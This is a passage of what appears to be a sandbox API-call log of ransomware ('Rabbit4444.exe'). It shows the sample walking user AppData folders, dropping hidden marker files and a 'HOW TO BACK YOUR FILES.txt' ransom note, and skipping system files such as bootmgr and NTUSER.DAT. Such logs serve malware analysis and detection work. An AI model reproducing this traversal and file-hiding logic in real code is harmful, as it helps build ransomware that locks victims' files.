SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\log\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0054.223] CloseHandle (hObject=0x27c) returned 1 [0054.223] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\log") returned 56 [0054.223] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0054.223] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\log\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb07402a4, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xd337c3d9, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe9a4ee50, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0054.223] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.223] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.223] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0054.223] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0054.223] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb07402a4, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xd337c3d9, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe9a4ee50, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.223] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.223] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.223] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0054.224] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0054.224] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0054.224] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe9a4ee50, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe9a4ee50, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe9a4ee50, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0054.224] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.224] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0054.224] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe9a4ee50, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe9a4ee50, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe9a4ee50, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0054.224] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0054.224] lstrcpyW (in: lpString1=0x130ebaa, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0054.224] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\log\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\sun\\java\\deployment\\log\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0054.224] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0054.224] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0054.224] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0054.225] CloseHandle (hObject=0x278) returned 1 [0054.225] CloseHandle (hObject=0x27c) returned 1 [0054.225] GetCurrentThreadId () returned 0xd98 [0054.225] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6410 [0054.225] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Mozilla", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Mozilla") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Mozilla" [0054.225] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115628 | out: hHeap=0xe0000) returned 1 [0054.225] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6408 | out: hHeap=0xe0000) returned 1 [0054.225] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Mozilla" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Mozilla") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Mozilla" [0054.225] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Mozilla", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Mozilla\\") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Mozilla\\" [0054.225] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Mozilla\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Mozilla\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Mozilla\\.BFC0E91B00AE8A0620D3" [0054.225] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Mozilla\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\mozilla\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0054.226] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0054.228] FlushFileBuffers (hFile=0x27c) returned 1 [0054.229] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Mozilla\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0054.229] CloseHandle (hObject=0x27c) returned 1 [0054.230] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Mozilla") returned 40 [0054.230] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0054.230] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Mozilla\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfdd2edaa, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xb844f993, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xe9a4ee50, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0054.230] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.230] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.230] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0054.230] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0054.230] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfdd2edaa, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xb844f993, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xe9a4ee50, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.230] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.230] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.230] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0054.230] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0054.230] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0054.230] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe9a4ee50, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe9a4ee50, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe9a4ee50, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0054.230] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.230] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0054.230] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe9a4ee50, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe9a4ee50, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe9a4ee50, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0054.230] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0054.230] lstrcpyW (in: lpString1=0x130eb8a, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0054.230] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Mozilla\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\mozilla\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0054.231] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0054.231] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0054.231] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0054.232] CloseHandle (hObject=0x278) returned 1 [0054.232] CloseHandle (hObject=0x27c) returned 1 [0054.232] GetCurrentThreadId () returned 0xd98 [0054.232] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf63f0 [0054.232] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft" [0054.232] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115c28 | out: hHeap=0xe0000) returned 1 [0054.232] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf63e8 | out: hHeap=0xe0000) returned 1 [0054.232] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft" [0054.232] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\" [0054.232] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\.BFC0E91B00AE8A0620D3" [0054.232] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\microsoft\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0054.234] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0054.236] FlushFileBuffers (hFile=0x27c) returned 1 [0054.237] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0054.237] CloseHandle (hObject=0x27c) returned 1 [0054.238] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft") returned 42 [0054.238] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0054.238] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xdfedb1f6, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x63cde605, ftLastAccessTime.dwHighDateTime=0x1d327ed, ftLastWriteTime.dwLowDateTime=0xe9a75134, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a10 [0054.238] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.238] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.238] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0054.238] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0054.238] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xdfedb1f6, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x63cde605, ftLastAccessTime.dwHighDateTime=0x1d327ed, ftLastWriteTime.dwLowDateTime=0xe9a75134, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.238] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.238] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.238] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0054.238] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0054.238] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0054.238] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe9a4ee50, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe9a4ee50, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe9a75134, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0054.238] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.238] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0054.238] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xdfedb1f6, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd323af8f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xdfedb1f6, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CryptnetUrlCache", cAlternateFileName="CRYPTN~1")) returned 1 [0054.238] lstrcmpiW (lpString1="CryptnetUrlCache", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.239] lstrcmpiW (lpString1="CryptnetUrlCache", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.239] lstrcmpiW (lpString1="CryptnetUrlCache", lpString2="Rabbit4444.exe") returned -1 [0054.239] lstrcmpiW (lpString1="CryptnetUrlCache", lpString2=".") returned 1 [0054.239] lstrcmpiW (lpString1="CryptnetUrlCache", lpString2="..") returned 1 [0054.239] lstrcmpiW (lpString1="CryptnetUrlCache", lpString2="windows") returned -1 [0054.239] lstrcmpiW (lpString1="CryptnetUrlCache", lpString2="bootmgr") returned 1 [0054.239] lstrcmpiW (lpString1="CryptnetUrlCache", lpString2="pagefile.sys") returned -1 [0054.239] lstrcmpiW (lpString1="CryptnetUrlCache", lpString2="boot") returned 1 [0054.239] lstrcmpiW (lpString1="CryptnetUrlCache", lpString2="ids.txt") returned -1 [0054.239] lstrcmpiW (lpString1="CryptnetUrlCache", lpString2="NTUSER.DAT") returned -1 [0054.239] lstrcpyW (in: lpString1=0x130eb8e, lpString2="CryptnetUrlCache" | out: lpString1="CryptnetUrlCache") returned="CryptnetUrlCache" [0054.239] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache", dwFileAttributes=0x2010) returned 1 [0054.239] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6368 [0054.239] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x78) returned 0x10dee8 [0054.239] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6370 | out: ListHead=0xf68b0, ListEntry=0xf6370) returned 0xf6670 [0054.239] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x63cde605, ftCreationTime.dwHighDateTime=0x1d327ed, ftLastAccessTime.dwLowDateTime=0x63cde605, ftLastAccessTime.dwHighDateTime=0x1d327ed, ftLastWriteTime.dwLowDateTime=0x63cde605, ftLastWriteTime.dwHighDateTime=0x1d327ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0054.239] lstrcmpiW (lpString1="Internet Explorer", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0054.239] lstrcmpiW (lpString1="Internet Explorer", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.239] lstrcmpiW (lpString1="Internet Explorer", lpString2="Rabbit4444.exe") returned -1 [0054.239] lstrcmpiW (lpString1="Internet Explorer", lpString2=".") returned 1 [0054.239] lstrcmpiW (lpString1="Internet Explorer", lpString2="..") returned 1 [0054.239] lstrcmpiW (lpString1="Internet Explorer", lpString2="windows") returned -1 [0054.239] lstrcmpiW (lpString1="Internet Explorer", lpString2="bootmgr") returned 1 [0054.239] lstrcmpiW (lpString1="Internet Explorer", lpString2="pagefile.sys") returned -1 [0054.239] lstrcmpiW (lpString1="Internet Explorer", lpString2="boot") returned 1 [0054.239] lstrcmpiW (lpString1="Internet Explorer", lpString2="ids.txt") returned 1 [0054.239] lstrcmpiW (lpString1="Internet Explorer", lpString2="NTUSER.DAT") returned -1 [0054.240] lstrcpyW (in: lpString1=0x130eb8e, lpString2="Internet Explorer" | out: lpString1="Internet Explorer") returned="Internet Explorer" [0054.240] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6348 [0054.240] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x7a) returned 0x101f30 [0054.240] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6350 | out: ListHead=0xf68b0, ListEntry=0xf6350) returned 0xf6370 [0054.240] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x63cde605, ftCreationTime.dwHighDateTime=0x1d327ed, ftLastAccessTime.dwLowDateTime=0x63cde605, ftLastAccessTime.dwHighDateTime=0x1d327ed, ftLastWriteTime.dwLowDateTime=0x63cde605, ftLastWriteTime.dwHighDateTime=0x1d327ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 0 [0054.240] FindClose (in: hFindFile=0x102a10 | out: hFindFile=0x102a10) returned 1 [0054.240] lstrcpyW (in: lpString1=0x130eb8e, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0054.240] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\microsoft\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0054.241] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0054.241] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0054.241] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0054.241] CloseHandle (hObject=0x278) returned 1 [0054.241] CloseHandle (hObject=0x27c) returned 1 [0054.241] GetCurrentThreadId () returned 0xd98 [0054.241] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6350 [0054.241] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\Internet Explorer", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\Internet Explorer") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\Internet Explorer" [0054.241] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101f30 | out: hHeap=0xe0000) returned 1 [0054.241] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6348 | out: hHeap=0xe0000) returned 1 [0054.241] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\Internet Explorer" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\Internet Explorer") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\Internet Explorer" [0054.241] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\Internet Explorer", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\" [0054.241] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\.BFC0E91B00AE8A0620D3" [0054.241] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\microsoft\\internet explorer\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0054.243] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0054.245] FlushFileBuffers (hFile=0x27c) returned 1 [0054.246] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0054.246] CloseHandle (hObject=0x27c) returned 1 [0054.246] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\Internet Explorer") returned 60 [0054.246] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0054.246] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x63cde605, ftCreationTime.dwHighDateTime=0x1d327ed, ftLastAccessTime.dwLowDateTime=0x63d07533, ftLastAccessTime.dwHighDateTime=0x1d327ed, ftLastWriteTime.dwLowDateTime=0xe9a75134, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, 